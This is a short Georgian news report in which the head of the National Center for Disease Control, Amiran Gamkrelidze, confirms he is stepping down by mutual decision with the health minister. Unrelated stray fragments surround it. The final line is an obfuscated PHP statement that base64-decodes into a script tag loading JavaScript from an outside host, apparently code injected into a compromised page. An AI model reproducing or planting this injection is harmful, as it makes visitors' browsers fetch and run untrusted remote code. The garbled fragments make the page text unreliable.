celsiusi
ავერსი შნაიდერი
დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელი ამირან გამყრელიძე დაკავებული თანამდებობიდან წასვლის შესახებ ჯანდაცვის მინისტრის მიერ გაჟღერებულ განცხადებას ადასტურებს და აცხადებს, რომ ეს გადაწყვეტილება მან და ზურაბ აზარაშვილმა „ორმხრივად“ მიიღეს. ამის შესახებ მან „ტვ პირველს“ განუცხადა.
 
„გიდასტურებთ, რომ ნამდვილად მივდივარ. დღეს იქნება შეხვედრა სამინისტროში, გავივლით იმ საკითხებს, რომელიც ეხება ყველაფრის ხავერდოვნად გადაბარებას. ჩვენი ცენტრი ერთ-ერთი წამყვანი დაწესებულებაა და აქ ძალიან ბევრი საქმე კეთდება. ეს საქმე, რომ არ იყოს მიშვებული გარდამავალი პერიოდის გეგმას დავსახავთ და ამის შემდეგ მე დავტოვებ პოსტს“, - განაცხადა ამირან გამყრელიძემ.
 
კითხვაზე - რატომ მიდის ამირან გამყრელიძე პოსტიდან, NCDC-ის ხელმძღვანელმა თქვა, რომ ამ კითხვაზე პასუხს ცენტრის წინაშე თავისი ანგარიშით წარდგენისას გასცემს. ხოლო კითხვაზე - ვისი გადწყვეტილებით ტოვებს თანამდებობას - მინისტრის თუ თავისი, გამყრელიძემ თქვა, რომ ეს ორმხრივი გადაწყვეტილება იყო.
503
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");